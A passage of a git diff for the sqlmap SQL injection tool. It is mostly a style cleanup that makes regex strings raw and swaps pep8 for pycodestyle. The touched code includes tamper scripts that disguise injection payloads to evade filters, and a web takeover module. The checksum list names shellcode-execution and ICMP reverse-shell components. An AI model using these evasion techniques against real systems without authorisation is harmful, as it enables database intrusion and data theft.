[], [])[0]: buff = sock.recv(4096) if 0 == len(buff): diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py index 5e0addab12b..84b94c54ee1 100644 --- a/extra/mssqlsig/update.py +++ b/extra/mssqlsig/update.py @@ -43,7 +43,7 @@ def updateMSSQLXML(): return - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I) + releases = re.findall(r"class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I) releasesCount = len(releases) # Create the minidom document @@ -74,7 +74,7 @@ def updateMSSQLXML(): stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall("(7\.0|2000|2005|2008|2008 R2)*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I) + servicepackVersion = re.findall(r"(7\.0|2000|2005|2008|2008 R2)*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I) for servicePack, version in servicepackVersion: if servicePack.startswith(" "): diff --git a/extra/shutils/newlines.py b/extra/shutils/newlines.py index 5fd91f96926..c506e5f4808 100644 --- a/extra/shutils/newlines.py +++ b/extra/shutils/newlines.py @@ -4,16 +4,15 @@ # Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html import os -import re import sys def check(filepath): if filepath.endswith(".py"): - content = open(filepath, "rb").read() - #if re.search(r"\r?\n\r?\n", content): + content = open(filepath, "rb").read() + if "\n\n\n" in content: index = content.find("\n\n\n") - print filepath, repr(content[index-30:index+30]) + print filepath, repr(content[index - 30:index + 30]) if __name__ == "__main__": try: diff --git a/extra/shutils/pep8.sh b/extra/shutils/pep8.sh deleted file mode 100755 index 5c15f54916d..00000000000 --- a/extra/shutils/pep8.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'LICENSE' for copying permission - -# Runs pep8 on all python files (prerequisite: apt-get install pep8) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh new file mode 100755 index 00000000000..79ab95743ce --- /dev/null +++ b/extra/shutils/pycodestyle.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle) +find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \; diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py index 6ff94d15621..6d8fb5acd09 100755 --- a/extra/shutils/regressiontest.py +++ b/extra/shutils/regressiontest.py @@ -27,7 +27,7 @@ SMTP_PORT = 25 SMTP_TIMEOUT = 30 FROM = "regressiontest@sqlmap.org" -#TO = "dev@sqlmap.org" +# TO = "dev@sqlmap.org" TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber()) TARGET = "debian" @@ -83,7 +83,7 @@ def main(): if stderr: failure_email("Execution of regression test failed with error:\n\n%s" % stderr) - failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout) + failed_tests = re.findall(r"running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout) for failed_test in failed_tests: title = failed_test[0] diff --git a/lib/core/agent.py b/lib/core/agent.py index 6f1380ac4b7..ebdbb6e4107 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -198,7 +198,7 @@ def _(pattern, repl, string): regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "") retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString) else: - retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString) + retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), r"%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString) if retVal == paramString and urlencode(parameter) != parameter: retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString) @@ -535,7 +535,7 @@ def getFields(self, query): fieldsToCastStr = fieldsToCastStr or "" # Function - if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr: + if re.search(r"\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr: fieldsToCastList = [fieldsToCastStr] else: fieldsToCastList = splitFields(fieldsToCastStr) @@ -627,7 +627,7 @@ def concatQuery(self, query, unpack=True): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) - concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery) + concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), r"\g<2>\g<1>\g<3>", concatenatedQuery) elif fieldsSelect: concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery += "||'%s'" % kb.chars.stop @@ -639,7 +639,7 @@ def concatQuery(self, query, unpack=True): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1) concatenatedQuery += "+'%s'" % kb.chars.stop elif fieldsSelectTop: - topNum = re.search("\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1) + topNum = re.search(r"\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1) concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1) concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1) elif fieldsSelectCase: diff --git a/lib/core/common.py b/lib/core/common.py index f3771e19ab5..39a7ae92b20 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1317,7 +1317,7 @@ def parseTargetDirect(): remote = False for dbms in SUPPORTED_DBMS: - details = re.search("^(?P%s)://(?P(?P.+?)\:(?P.*)\@)?(?P(?P[\w.-]+?)\:(?P[\d]+)\/)?(?P[\w\d\ \:\.\_\-\/\\\\]+?)$" % dbms, conf.direct, re.I) + details = re.search(r"^(?P%s)://(?P(?P.+?)\:(?P.*)\@)?(?P(?P[\w.-]+?)\:(?P[\d]+)\/)?(?P[\w\d\ \:\.\_\-\/\\]+?)$" % dbms, conf.direct, re.I) if details: conf.dbms = details.group("dbms") @@ -1440,7 +1440,7 @@ def parseTargetUrl(): errMsg += "in the hostname part" raise SqlmapGenericException(errMsg) - hostnamePort = urlSplit.netloc.split(":") if not re.search(r"\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search(r"\](:(?P\d+))?", urlSplit.netloc).group("port"))) + hostnamePort = urlSplit.netloc.split(":") if not re.search(r"\[.+\]", urlSplit.netloc) else filter(None, (re.search(r"\[.+\]", urlSplit.netloc).group(0), re.search(r"\](:(?P\d+))?", urlSplit.netloc).group("port"))) conf.scheme = (urlSplit.scheme.strip().lower() or "http") if not conf.forceSSL else "https" conf.path = urlSplit.path.strip() @@ -3355,7 +3355,7 @@ def createGithubIssue(errMsg, excMsg): _ = re.sub(r"'[^']+'", "''", excMsg) _ = re.sub(r"\s+line \d+", "", _) - _ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _) + _ = re.sub(r'File ".+?/(\w+\.py)', r"\g<1>", _) _ = re.sub(r".+\Z", "", _) key = hashlib.md5(_).hexdigest()[:8] @@ -3522,6 +3522,7 @@ def _(value): regex = r"%s\b" % regex _retVal = [retVal] + def _thread(regex): try: _retVal[0] = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, _retVal[0]) @@ -3957,6 +3958,7 @@ class _(StringIO): def __init__(self, content, url): StringIO.__init__(self, unicodeencode(content, kb.pageEncoding) if isinstance(content, unicode) else content) self._url = url + def geturl(self): return self._url @@ -4082,7 +4084,7 @@ def getHostHeader(url): retVal = urlparse.urlparse(url).netloc if re.search(r"http(s)?://\[.+\]", url, re.I): - retVal = extractRegexResult("http(s)?://\[(?P.+)\]", url) + retVal = extractRegexResult(r"http(s)?://\[(?P.+)\]", url) elif any(retVal.endswith(':%d' % _) for _ in (80, 443)): retVal = retVal.split(':')[0] @@ -4339,7 +4341,7 @@ def resetCookieJar(cookieJar): except cookielib.LoadError, msg: errMsg = "there was a problem loading " - errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", "\g<1>", str(msg)) + errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", r"\g<1>", str(msg)) raise SqlmapGenericException(errMsg) def decloakToTemp(filename): diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 1bf5d512798..0dfdbdaa3ec 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -38,4 +38,4 @@ def _(*args, **kwargs): return result - return _ \ No newline at end of file + return _ diff --git a/lib/core/option.py b/lib/core/option.py index 23daf5761ad..75bd66eac45 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1722,7 +1722,7 @@ def _cleanupOptions(): if conf.testFilter: conf.testFilter = conf.testFilter.strip('*+') - conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter) + conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter) try: re.compile(conf.testFilter) @@ -1731,7 +1731,7 @@ def _cleanupOptions(): if conf.testSkip: conf.testSkip = conf.testSkip.strip('*+') - conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip) + conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip) try: re.compile(conf.testSkip) diff --git a/lib/core/settings.py b/lib/core/settings.py index 353e7352b45..1d86bc30d6f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.15" +VERSION = "1.2.6.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -364,7 +364,7 @@ URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z" # Regex used for masking sensitive data -SENSITIVE_DATA_REGEX = "(\s|=)(?P[^\s=]*%s[^\s]*)\s" +SENSITIVE_DATA_REGEX = r"(\s|=)(?P[^\s=]*%s[^\s]*)\s" # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the inside) SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") @@ -388,7 +388,7 @@ CUSTOM_INJECTION_MARK_CHAR = '*' # Other way to declare injection position -INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%' +INJECT_HERE_REGEX = r"(?i)%INJECT[_ ]?HERE%" # Minimum chunk length used for retrieving data over error based payloads MIN_ERROR_CHUNK_LENGTH = 8 @@ -487,7 +487,7 @@ REFLECTIVE_MISS_THRESHOLD = 20 # Regular expression used for extracting HTML title -HTML_TITLE_REGEX = "(?P<result>[^<]+)" +HTML_TITLE_REGEX = r"(?P<result>[^<]+)" # Table used for Base64 conversion in WordPress hash cracking routine ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" @@ -631,7 +631,7 @@ DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" # Regular expression used for recognition of file inclusion errors -FI_ERROR_REGEX = "(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" +FI_ERROR_REGEX = r"(?i)[^\n]{0,100}(no such file|failed (to )?open)[^\n]{0,100}" # Length of prefix and suffix used in non-SQLI heuristic checks NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 diff --git a/lib/core/target.py b/lib/core/target.py index abddc942834..8e38389b94e 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -148,8 +148,8 @@ def process(match, repl): match = re.search(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data) if match and not (conf.testParameter and match.group("name") not in conf.testParameter): _ = match.group(2) - _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _) - _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _) + _ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _) + _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _) conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) kb.postHint = POST_HINT.JSON diff --git a/lib/request/basic.py b/lib/request/basic.py index 931e8becf57..9dd83434323 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -35,7 +35,6 @@ from lib.core.exception import SqlmapCompressionException from lib.core.settings import BLOCKED_IP_REGEX from lib.core.settings import DEFAULT_COOKIE_DELIMITER -from lib.core.settings import DEV_EMAIL_ADDRESS from lib.core.settings import EVENTVALIDATION_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import META_CHARSET_REGEX diff --git a/lib/request/connect.py b/lib/request/connect.py index 6bdb5b69e46..3ad2ed32d3e 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -8,7 +8,6 @@ import binascii import compiler import httplib -import json import keyword import logging import re @@ -408,8 +407,10 @@ def getPage(**kwargs): ws.close() code = ws.status status = httplib.responses[code] + class _(dict): pass + responseHeaders = _(ws.getheaders()) responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] @@ -736,10 +737,10 @@ class _(dict): if conn and getattr(conn, "redurl", None): _ = urlparse.urlsplit(conn.redurl) _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) - requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) + requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) if kb.resendPostOnRedirect is False: - requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg) + requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg) requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg) requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg) @@ -1104,33 +1105,33 @@ def _randomizeParameter(paramString, randomParameter): if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP): if re.search(r"<%s\b" % re.escape(name), post): found = True - post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(%s\g<3>" % value.replace('\\', r'\\'), post) + post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(%s\g<3>" % value.replace('\\', r'\\'), post) elif re.search(r"\b%s>" % re.escape(name), post): found = True - post = re.sub(r"(?s)(\b%s>)(.*?)()" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post) + post = re.sub(r"(?s)(\b%s>)(.*?)()" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post) regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name) if not found and re.search(regex, (post or "")): found = True - post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post) + post = re.sub(regex, r"\g<1>\g<2>%s" % value.replace('\\', r'\\'), post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) if not found and re.search(regex, (post or "")): found = True - post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post) + post = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post) if re.search(regex, (get or "")): found = True - get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get) + get = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), get) if re.search(regex, (query or "")): found = True - uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri) + uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) if re.search(regex, (cookie or "")): found = True - cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie) + cookie = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie) if not found: if post is not None: diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 8f5b5616d08..91e6bd9a458 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -219,7 +219,7 @@ def webInit(self): finally: been.add(url) - url = re.sub(r"(\.\w+)\Z", "~\g<1>", conf.url) + url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url) if url not in been: try: page, _, _ = Request.getPage(url=url, raise404=False, silent=True) @@ -231,7 +231,7 @@ def webInit(self): for place in (PLACE.GET, PLACE.POST): if place in conf.parameters: - value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place]) + value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=", conf.parameters[place]) if "[]" in value: page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) @@ -243,12 +243,12 @@ def webInit(self): cookie = headers[HTTP_HEADER.SET_COOKIE] if cookie: - value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie) if value != cookie: page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) - value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie) + value = re.sub(r"(\A|;)(\w+)=[^;]*", r"\g<2>=", cookie) if value != cookie: page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False) parseFilePaths(page) diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 3cf607b5451..a90967e99d5 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -83,7 +83,7 @@ def dnsUse(payload, expression): _ = conf.dnsServer.pop(prefix, suffix) if _: - _ = extractRegexResult("%s\.(?P.+)\.%s" % (prefix, suffix), _, re.I) + _ = extractRegexResult(r"%s\.(?P.+)\.%s" % (prefix, suffix), _, re.I) _ = decodeHexValue(_) output = (output or "") + _ offset += len(_) diff --git a/lib/utils/api.py b/lib/utils/api.py index cbdce996790..ee0cab9c71a 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -498,9 +498,7 @@ def scan_stop(taskid): Stop a scan """ - if (taskid not in DataStore.tasks or - DataStore.tasks[taskid].engine_process() is None or - DataStore.tasks[taskid].engine_has_terminated()): + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -515,9 +513,7 @@ def scan_kill(taskid): Kill a scan """ - if (taskid not in DataStore.tasks or - DataStore.tasks[taskid].engine_process() is None or - DataStore.tasks[taskid].engine_has_terminated()): + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py index 98338863b6b..9ae8e55860b 100644 --- a/lib/utils/xrange.py +++ b/lib/utils/xrange.py @@ -49,12 +49,10 @@ def __hash__(self): return hash(self._slice) def __cmp__(self, other): - return (cmp(type(self), type(other)) or - cmp(self._slice, other._slice)) + return (cmp(type(self), type(other)) or cmp(self._slice, other._slice)) def __repr__(self): - return '%s(%r, %r, %r)' % (type(self).__name__, - self.start, self.stop, self.step) + return '%s(%r, %r, %r)' % (type(self).__name__, self.start, self.stop, self.step) def __len__(self): return self._len() diff --git a/sqlmap.py b/sqlmap.py index 4d1a16a4359..618ea99fb79 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -397,4 +397,4 @@ def main(): main() else: # cancelling postponed imports (because of Travis CI checks) - from lib.controller.controller import start \ No newline at end of file + from lib.controller.controller import start diff --git a/tamper/0x2char.py b/tamper/0x2char.py index f08a434e59c..bc3b7a433f9 100644 --- a/tamper/0x2char.py +++ b/tamper/0x2char.py @@ -7,7 +7,6 @@ import re -from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL diff --git a/tamper/between.py b/tamper/between.py index e64628f127f..d805523a216 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -46,7 +46,7 @@ def tamper(payload, **kwargs): _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) retVal = retVal.replace(match.group(0), _) else: - retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", " NOT BETWEEN 0 AND \g<1>", payload) + retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) if retVal == payload: match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*(\w+)\s*", payload) diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py index 0fdc180e66a..17525286e2f 100644 --- a/tamper/commentbeforeparentheses.py +++ b/tamper/commentbeforeparentheses.py @@ -35,6 +35,6 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = re.sub(r"\b(\w+)\(", "\g<1>/**/(", retVal) + retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal) return retVal diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index cec299ed705..57c3f5460dc 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -22,6 +22,6 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = re.sub(r"(?i)(information_schema)\.", "\g<1>/**/.", payload) + retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload) return retVal diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index b00a0b1b8c2..40a2b033c06 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -43,7 +43,7 @@ def tamper(payload, **kwargs): words.add(word) for word in words: - retVal = re.sub("(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) - retVal = re.sub("(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) + retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) + retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) return retVal diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1f0f33c6f03..84f60fc773b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -5,10 +5,10 @@ b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py 1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ -fe39e5c315d63afff5cb99ec42fc883f extra/icmpsh/icmpsh_m.py +708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py 2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py 1e5532ede194ac9c083891c2f02bca93 extra/__init__.py -27629e01ba722271c990ad4b27151917 extra/mssqlsig/update.py +fe141ec3178a46e7151c7f34bb747c68 extra/mssqlsig/update.py ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ 1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py @@ -16,9 +16,9 @@ d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ 2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ 220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py -1f33abe1a67493909d29a35ca72ecedb extra/shutils/newlines.py +e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py -c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py +1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py @@ -26,13 +26,13 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -ee096e173a5caa7724e751c693880925 lib/core/agent.py +0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -59246d63fd0f8ffa6db61ff1ba0797c8 lib/core/common.py +6470770fb1296acb13c3e49a77ee0159 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -93567739d591829c1fb9ff77a50bcc87 lib/core/decorators.py +4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py @@ -41,16 +41,16 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -83345a6b0b7e187d2cbcc280a509f03e lib/core/option.py +718646541f2b446f40533149fc0f1b30 lib/core/option.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bb3cda01d9f6c71382beba250e0777fc lib/core/settings.py +c769cdd91e5adaf3c6a1cdfe24b7a544 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -6306284edcccc185b2df085438572b0d lib/core/target.py +8f8613d1a960d53655ceee0114e2b206 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py 